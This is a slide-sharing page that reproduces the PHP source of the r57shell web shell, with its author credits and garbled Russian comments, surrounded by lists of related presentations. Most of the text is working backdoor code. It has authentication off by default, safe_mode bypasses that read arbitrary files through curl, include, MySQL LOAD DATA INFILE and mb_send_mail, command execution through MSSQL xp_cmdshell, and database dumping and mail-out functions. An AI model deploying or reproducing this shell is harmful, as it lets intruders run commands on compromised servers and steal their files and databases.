else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } echo $font.$lang[$language.'_text1'].": <b>". $_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>"; if($safe_mode) { switch($_POST['cmd']) { case 'safe_dir': $d=@dir($dir); if ($d) { while (false!==($file=$d->read())) { if ($file=="." || $file=="..") continue; @clearstatcache(); list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); if($windows){ echo date("d.m.Y H:i",$mtime); if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); } else{ $owner = @posix_getpwuid($uid); $grgid = @posix_getgrgid($gid); echo $inode." "; echo perms(@fileperms($file)); printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); echo date("d.m.Y H:i ",$mtime); } echo "$filen"; } $d->close(); } else echo $lang[$language._text29]; break; case 'safe_file': if(@is_file($_POST['file'])) { $file = @file($_POST['file']); if($file) { $c = @sizeof($file); for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } } else echo $lang[$language._text29]; } else echo $lang[$language._text31]; break; case 'test1': $ci = @curl_init("file://".$_POST['test1_file'].""); $cf = @curl_exec($ci); echo $cf; break; case 'test2': @include($_POST['test2_file']); break; case 'test3': if(!isset($_POST['test3_port'])||empty($_POST['test3_port']))
{ $_POST['test3_port'] = "3306"; } $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'], $_POST['test3_mp']); if($db) { if(@mysql_select_db($_POST['test3_md'],$db)) { $sql = "DROP TABLE IF EXISTS temp_r57_table;"; @mysql_query($sql); $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; @mysql_query($sql); $sql = "LOAD DATA INFILE "".$_POST['test3_file']."" INTO TABLE temp_r57_table;"; @mysql_query($sql); $sql = "SELECT * FROM temp_r57_table;"; $r = @mysql_query($sql); while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } $sql = "DROP TABLE IF EXISTS temp_r57_table;"; @mysql_query($sql); } else echo "[-] ERROR! Can't select database"; @mysql_close($db); } else echo "[-] ERROR! Can't connect to mysql server"; break; case 'test4': if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'], $_POST['test4_mp']); if($db) { if(@mssql_select_db($_POST['test4_md'],$db)) { @mssql_query("drop table r57_temp_table",$db); @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '". $_POST['test4_file']."'",$db); $res = mssql_query("select * from r57_temp_table",$db); while(($row=@mssql_fetch_row($res))) { echo $row[0]."rn"; } @mssql_query("drop table r57_temp_table",$db); } else echo "[-] ERROR! Can't select database"; @mssql_close($db); } else echo "[-] ERROR! Can't connect to MSSQL server"; break; case 'test5': if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail'); $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail"; @mb_send_mail(NULL, NULL, NULL, NULL, $extra); $lines = file ('/tmp/mb_send_mail'); foreach ($lines as $line) { echo htmlspecialchars($line)."rn"; } break; case 'test6':
Nop2
Nop2
Nop2
Nop2
Nop2
Nop2
Nop2
Nop2
Nop2

Recommandé

WordPress Security: Be a Superhero - WordCamp Raleigh - May 2011
WordPress Security: Be a Superhero - WordCamp Raleigh - May 2011WordPress Security: Be a Superhero - WordCamp Raleigh - May 2011
WordPress Security: Be a Superhero - WordCamp Raleigh - May 2011
John Ford
 
R57php 1231677414471772-2
R57php 1231677414471772-2R57php 1231677414471772-2
R57php 1231677414471772-2
ady36
 
Itsecteam shell
Itsecteam shellItsecteam shell
Itsecteam shell
ady36
 
Get into the FLOW with Extbase
Get into the FLOW with ExtbaseGet into the FLOW with Extbase
Get into the FLOW with Extbase
Jochen Rau
 
London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)
Dennis Knochenwefel
 
PHP Tips & Tricks
PHP Tips & TricksPHP Tips & Tricks
PHP Tips & Tricks
Radek Benkel
 
Building Your First Widget
Building Your First WidgetBuilding Your First Widget
Building Your First Widget
Chris Wilcoxson
 
Speeding up Red Team engagements with carnivorall
Speeding up Red Team engagements with carnivorallSpeeding up Red Team engagements with carnivorall
Speeding up Red Team engagements with carnivorall
Nullbyte Security Conference
 

Recommandé

WordPress Security: Be a Superhero - WordCamp Raleigh - May 2011
WordPress Security: Be a Superhero - WordCamp Raleigh - May 2011WordPress Security: Be a Superhero - WordCamp Raleigh - May 2011
WordPress Security: Be a Superhero - WordCamp Raleigh - May 2011
John Ford
 
R57php 1231677414471772-2
R57php 1231677414471772-2R57php 1231677414471772-2
R57php 1231677414471772-2
ady36
 
Itsecteam shell
Itsecteam shellItsecteam shell
Itsecteam shell
ady36
 
Get into the FLOW with Extbase
Get into the FLOW with ExtbaseGet into the FLOW with Extbase
Get into the FLOW with Extbase
Jochen Rau
 
London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)London XQuery Meetup: Querying the World (Web Scraping)
London XQuery Meetup: Querying the World (Web Scraping)
Dennis Knochenwefel
 
PHP Tips & Tricks
PHP Tips & TricksPHP Tips & Tricks
PHP Tips & Tricks
Radek Benkel
 
Building Your First Widget
Building Your First WidgetBuilding Your First Widget
Building Your First Widget
Chris Wilcoxson
 
Speeding up Red Team engagements with carnivorall
Speeding up Red Team engagements with carnivorallSpeeding up Red Team engagements with carnivorall
Speeding up Red Team engagements with carnivorall
Nullbyte Security Conference
 
Php
PhpPhp
Php
Linh Tran
 
Getfilestruct zbksh(1)
Getfilestruct zbksh(1)Getfilestruct zbksh(1)
Getfilestruct zbksh(1)
Ben Pope
 
C99[2]
C99[2]C99[2]
C99[2]
guest8914af
 
Танки_в_Лунапарке: нагрузочное_тестирование_в_Яндексе
Танки_в_Лунапарке: нагрузочное_тестирование_в_ЯндексеТанки_в_Лунапарке: нагрузочное_тестирование_в_Яндексе
Танки_в_Лунапарке: нагрузочное_тестирование_в_Яндексе
Yandex
 
C99
C99C99
C99
sifo12
 
[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?
Radek Benkel
 
Simple Ways To Be A Better Programmer (OSCON 2007)
Simple Ways To Be A Better Programmer (OSCON 2007)Simple Ways To Be A Better Programmer (OSCON 2007)
Simple Ways To Be A Better Programmer (OSCON 2007)
Michael Schwern
 
PHP 5.4
PHP 5.4PHP 5.4
PHP 5.4
Federico Damián Lozada Mosto
 
Daily notes
Daily notesDaily notes
Daily notes
meghendra168
 
PHPUnit でよりよくテストを書くために
PHPUnit でよりよくテストを書くためにPHPUnit でよりよくテストを書くために
PHPUnit でよりよくテストを書くために
Yuya Takeyama
 
Teaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersTeaching Your Machine To Find Fraudsters
Teaching Your Machine To Find Fraudsters
Ian Barber
 
Bouncingballs sh
Bouncingballs shBouncingballs sh
Bouncingballs sh
Ben Pope
 
How to stand on the shoulders of giants
How to stand on the shoulders of giantsHow to stand on the shoulders of giants
How to stand on the shoulders of giants
Ian Barber
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
Ian Barber
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
Sanketkumar Biswas
 
Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)
Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)
Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)
James Titcumb
 
Phpで作るmovable typeプラグイン
Phpで作るmovable typeプラグインPhpで作るmovable typeプラグイン
Phpで作るmovable typeプラグイン
Yuji Takayama
 
R57.Php
R57.PhpR57.Php
R57.Php
guest63876e
 
☣ ppencode ♨
☣ ppencode ♨☣ ppencode ♨
☣ ppencode ♨
Audrey Tang
 
FUEL-cleanEnergy
FUEL-cleanEnergyFUEL-cleanEnergy
FUEL-cleanEnergy
Jim Romeo
 
IST 561 Session 3, Feb 9, 2009--XHMTL and CSS basics
IST 561 Session 3, Feb 9, 2009--XHMTL and CSS basicsIST 561 Session 3, Feb 9, 2009--XHMTL and CSS basics
IST 561 Session 3, Feb 9, 2009--XHMTL and CSS basics
D.A. Garofalo
 
LAMP_TRAINING_SESSION_1
LAMP_TRAINING_SESSION_1LAMP_TRAINING_SESSION_1
LAMP_TRAINING_SESSION_1
umapst
 

Contenu connexe

Tendances

Getfilestruct zbksh(1)
Getfilestruct zbksh(1)Getfilestruct zbksh(1)
Getfilestruct zbksh(1)
Ben Pope
 
Phpで作るmovable typeプラグイン
Phpで作るmovable typeプラグインPhpで作るmovable typeプラグイン
Phpで作るmovable typeプラグイン
Yuji Takayama
 

Tendances (17)

Php
PhpPhp
Php
 
Getfilestruct zbksh(1)
Getfilestruct zbksh(1)Getfilestruct zbksh(1)
Getfilestruct zbksh(1)
 
C99[2]
C99[2]C99[2]
C99[2]
 
Танки_в_Лунапарке: нагрузочное_тестирование_в_Яндексе
Танки_в_Лунапарке: нагрузочное_тестирование_в_ЯндексеТанки_в_Лунапарке: нагрузочное_тестирование_в_Яндексе
Танки_в_Лунапарке: нагрузочное_тестирование_в_Яндексе
 
C99
C99C99
C99
 
[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?[PL] Jak nie zostać "programistą" PHP?
[PL] Jak nie zostać "programistą" PHP?
 
Simple Ways To Be A Better Programmer (OSCON 2007)
Simple Ways To Be A Better Programmer (OSCON 2007)Simple Ways To Be A Better Programmer (OSCON 2007)
Simple Ways To Be A Better Programmer (OSCON 2007)
 
PHP 5.4
PHP 5.4PHP 5.4
PHP 5.4
 
Daily notes
Daily notesDaily notes
Daily notes
 
PHPUnit でよりよくテストを書くために
PHPUnit でよりよくテストを書くためにPHPUnit でよりよくテストを書くために
PHPUnit でよりよくテストを書くために
 
Teaching Your Machine To Find Fraudsters
Teaching Your Machine To Find FraudstersTeaching Your Machine To Find Fraudsters
Teaching Your Machine To Find Fraudsters
 
Bouncingballs sh
Bouncingballs shBouncingballs sh
Bouncingballs sh
 
How to stand on the shoulders of giants
How to stand on the shoulders of giantsHow to stand on the shoulders of giants
How to stand on the shoulders of giants
 
Debugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 VersionDebugging: Rules And Tools - PHPTek 11 Version
Debugging: Rules And Tools - PHPTek 11 Version
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
 
Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)
Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)
Dip Your Toes in the Sea of Security (PHP MiNDS January Meetup 2016)
 
Phpで作るmovable typeプラグイン
Phpで作るmovable typeプラグインPhpで作るmovable typeプラグイン
Phpで作るmovable typeプラグイン
 

Similaire à Nop2

FUEL-cleanEnergy
FUEL-cleanEnergyFUEL-cleanEnergy
FUEL-cleanEnergy
Jim Romeo
 
C A S Sample Php
C A S Sample PhpC A S Sample Php
C A S Sample Php
JH Lee
 
Optimisation tnc1
Optimisation tnc1Optimisation tnc1
Optimisation tnc1
bdsea89
 
Oneal perl-code-to-extract-from-voyager
Oneal perl-code-to-extract-from-voyagerOneal perl-code-to-extract-from-voyager
Oneal perl-code-to-extract-from-voyager
ENUG
 
20 modules i haven't yet talked about
20 modules i haven't yet talked about20 modules i haven't yet talked about
20 modules i haven't yet talked about
Tatsuhiko Miyagawa
 

Similaire à Nop2 (20)

R57.Php
R57.PhpR57.Php
R57.Php
 
☣ ppencode ♨
☣ ppencode ♨☣ ppencode ♨
☣ ppencode ♨
 
FUEL-cleanEnergy
FUEL-cleanEnergyFUEL-cleanEnergy
FUEL-cleanEnergy
 
IST 561 Session 3, Feb 9, 2009--XHMTL and CSS basics
IST 561 Session 3, Feb 9, 2009--XHMTL and CSS basicsIST 561 Session 3, Feb 9, 2009--XHMTL and CSS basics
IST 561 Session 3, Feb 9, 2009--XHMTL and CSS basics
 
LAMP_TRAINING_SESSION_1
LAMP_TRAINING_SESSION_1LAMP_TRAINING_SESSION_1
LAMP_TRAINING_SESSION_1
 
C A S Sample Php
C A S Sample PhpC A S Sample Php
C A S Sample Php
 
Import transaction
Import transactionImport transaction
Import transaction
 
2011 WBECS Speaker Final Lineup
2011 WBECS Speaker Final Lineup 2011 WBECS Speaker Final Lineup
2011 WBECS Speaker Final Lineup
 
pvrb GV Physik am Velo 12.03.27 Dacfey
pvrb GV Physik am Velo 12.03.27 Dacfeypvrb GV Physik am Velo 12.03.27 Dacfey
pvrb GV Physik am Velo 12.03.27 Dacfey
 
Optimisation tnc1
Optimisation tnc1Optimisation tnc1
Optimisation tnc1
 
Carta Informativa
Carta InformativaCarta Informativa
Carta Informativa
 
Letter july
Letter july Letter july
Letter july
 
Letter july
Letter july Letter july
Letter july
 
Sk.php
Sk.phpSk.php
Sk.php
 
Sk.php
Sk.phpSk.php
Sk.php
 
LAMP_TRAINING_SESSION_6
LAMP_TRAINING_SESSION_6LAMP_TRAINING_SESSION_6
LAMP_TRAINING_SESSION_6
 
Oneal perl-code-to-extract-from-voyager
Oneal perl-code-to-extract-from-voyagerOneal perl-code-to-extract-from-voyager
Oneal perl-code-to-extract-from-voyager
 
Perl Bag of Tricks - Baltimore Perl mongers
Perl Bag of Tricks - Baltimore Perl mongersPerl Bag of Tricks - Baltimore Perl mongers
Perl Bag of Tricks - Baltimore Perl mongers
 
Five ten presentation
Five ten presentationFive ten presentation
Five ten presentation
 
20 modules i haven't yet talked about
20 modules i haven't yet talked about20 modules i haven't yet talked about
20 modules i haven't yet talked about
 

Nop2

  • 1. <?php / *********************************************************************************** *******************/ /* /* # # # # /* # # # # /* # # # # /* # ## #### ## # /* ## ## ###### ## ## /* ## ## ###### ## ## /* ## ## #### ## ## /* ### ############ ### /* ######################## /* ############## /* ######## ########## ####### /* ### ## ########## ## ### /* ### ## ########## ## ### /* ### # ########## # ### /* ### ## ######## ## ### /* ## # ###### # ## /* ## # #### # ## /* ## ## /* r57shell.php - ñêðèïò Ãà ïõï ïîçâîëÿþùèé âà ì à ¢Ã»Ã¯Ã®Ã«Ãÿòü ñèñòåìÃûå êîìà Ãäû Ãà ñåðâåðå ÷åðåç áà °Ã óçåð /* åû ìîæåòå ñêà ÷à òü Ãîâóþ âåðñèþ Ãà Ãà øåì ñà éòå: http://c99shell.com /* ååðñèÿ: 1.3 (05.03.2006) / *~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~*/ /* ÎòäåëüÃà ÿ áëà ãîäà ðÃîñòü çà ïîìîùü è èäåè: blf, phoenix, virus, NorD è âñåì ÷åðòÿì èç RST/GHC. /* Åñëè ó Ãoà ñ åñòü êà êèå-ëèáî èäåè ïî ïîâîäó òîãî êà êèå åóÃêöèè ñëåäóåò äîáà âèòü â ñêðèïò òî ïèøèòå /* Ãà rst@void.ru. ÃÃñå ïðåäëîæåÃèÿ áóäóò ðà ññìîòðåÃû. / *~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~*/ /* (c)oded by 1dt.w0lf /* RST/GHC http://c99shell.com , http://ghc.ru /* ANY MODIFIED REPUBLISHING IS RESTRICTED / *********************************************************************************** *******************/ /* ~~~ Íà ñòðîéêè | Options ~~~ */ // ÃÃûáîð ÿçûêà | Language // $language='ru' - ðóññêèé (russian) // $language='eng' - english (à Ããëèéñêèé) $language='eng'; // ÀóòåÃòèåèêà öèÿ | Authentification // $auth = 1; - ÀóòåÃòèåèêà öèÿ âêëþ÷åÃà ( authentification = On ) // $auth = 0; - ÀóòåÃòèåèêà öèÿ âûêëþ÷åÃà ( authentification = Off )
  • 2. $auth = 0; // Ëîãèà è ïà ðîëü äëÿ äîñòóïà ê ñêðèïòó (Login & Password for access) // ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅ ÐÃÃÅÐÅ!!! (CHANGE THIS!!!) // Ëîãèà è ïà ðîëü øèåðóþòñÿ ñ ïîìîùüþ à ëãîà °Ã¨Ã²Ã¬Ã md5, çÃà ÷åÃèÿ ïî óìîë÷à Ãèþ 'r57' // Login & password crypted with md5, default is 'r57' $name='ec371748dc2da624b35a4f8f685dd122'; // ëîãèà ïîëüçîâà òåëÿ (user login) $pass='ec371748dc2da624b35a4f8f685dd122'; // ïà ðîëü ïîëüçîâà òåëÿ (user password) / *********************************************************************************** *******************/ error_reporting(0); set_magic_quotes_runtime(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $safe_mode = @ini_get('safe_mode'); $version = "1.3"; if(version_compare(phpversion(), '4.1.0') == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_SERVER as $k=>$v) { $_SERVER[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm="r57shell"'); header('HTTP/1.0 401 Unauthorized'); exit("<b><a href=http://c99shell.com>r57shell</a> : Access Denied</b>"); } } $head = '<!-- Çäðà âñòâóé Çà ñÿ --> <html> <head> <title>r57shell</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <STYLE> tr { BORDER-RIGHT: #aaaaaa 1px solid;
  • 3. BORDER-TOP: #E8481C 1px solid; BORDER-LEFT: #E8481C 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; } td { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #E8481C 1px solid; BORDER-LEFT: #E8481C 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; } .table1 { BORDER-RIGHT: #3A6EA5 0px; BORDER-TOP: #3A6EA5 0px; BORDER-LEFT: #3A6EA5 0px; BORDER-BOTTOM: #3A6EA5 0px; BACKGROUND-COLOR: #81D1EE; } .td1 { BORDER-RIGHT: #3A6EA5 0px; BORDER-TOP: #3A6EA5 0px; BORDER-LEFT: #3A6EA5 0px; BORDER-BOTTOM: #3A6EA5 0px; font: 7pt Verdana; } .tr1 { BORDER-RIGHT: #3A6EA5 0px; BORDER-TOP: #3A6EA5 0px; BORDER-LEFT: #3A6EA5 0px; BORDER-BOTTOM: #3A6EA5 0px; } table { BORDER-RIGHT: #E8481C 1px outset; BORDER-TOP: #E8481C 1px outset; BORDER-LEFT: #E8481C 1px outset; BORDER-BOTTOM: #E8481C 1px outset; BACKGROUND-COLOR: #81D1EE; } input { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #FC602B 1px solid; BORDER-LEFT: #FC602B 1px solid; BORDER-BOTTOM: #000000 1px solid; BACKGROUND-COLOR: #FFFFFF; font: 8pt Verdana; } select { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #FC602B 1px solid; BORDER-LEFT: #FC602B 1px solid; BORDER-BOTTOM: #000000 1px solid; BACKGROUND-COLOR: #FFFFFF; font: 8pt Verdana; } submit { BORDER-RIGHT: buttonhighlight 2px outset; BORDER-TOP: buttonhighlight 2px outset; BORDER-LEFT: buttonhighlight 2px outset; BORDER-BOTTOM: buttonhighlight 2px outset; BACKGROUND-COLOR: #FFFFFF;
  • 4. width: 30%; } textarea { BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #FC602B 1px solid; BORDER-LEFT: #FC602B 1px solid; BORDER-BOTTOM: #000000 1px solid; BACKGROUND-COLOR: #FFFFFF; font: Fixedsys bold; } BODY { margin-top: 1px; margin-right: 1px; margin-bottom: 1px; margin-left: 1px; } A:link {COLOR:white; TEXT-DECORATION: none} A:visited { COLOR:white; TEXT-DECORATION: none} A:active {COLOR:white; TEXT-DECORATION: none} A:hover {color:blue;TEXT-DECORATION: none} </STYLE>'; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = 'x' . $dtime[6] . $dtime[7] . 'x' . $dtime[4] . $dtime[5] . 'x' . $dtime[2] . $dtime[3] . 'x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "x50x4bx03x04"; $fr .= "x14x00"; $fr .= "x00x00"; $fr .= "x08x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data);
  • 5. $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "x50x4bx01x02"; $cdrec .= "x00x00"; $cdrec .= "x14x00"; $cdrec .= "x00x00"; $cdrec .= "x08x00"; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "x00x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip';
  • 6. $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function mailattach($to,$from,$subj,$attach) { $headers = "From: $fromrn"; $headers .= "MIME-Version: 1.0rn"; $headers .= "Content-Type: ".$attach['type']; $headers .= "; name="".$attach['name'].""rn"; $headers .= "Content-Transfer-Encoding: base64rnrn"; $headers .= chunk_split(base64_encode($attach['content']))."rn"; if(@mail($to,$subj,"",$headers)) { return 1; } return 0; } class my_sql { var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) { $this->port = '3306'; } if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user, $this->pass); if(is_resource($this->connection)) return 1; break; case 'MSSQL': if(empty($this->port)) { $this->port = '1433'; } if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,
  • 7. $this->pass); if($this->connection) return 1; break; case 'PostgreSQL': if(empty($this->port)) { $this->port = '5432'; } $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() { switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; } return 0; } function query($query) { $this->res=$this->error=''; switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this- >connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error';
  • 8. return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error'; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2; return 1; } $error = @ocierror(); $this->error=$error['message']; } break; } return 0; } function get_result() { $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
  • 9. @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this- >num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '## Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table']; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this- >columns).'`) VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this- >columns).') VALUES (''.@implode("', '", $this->rows[$i]).'');'; } break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) {
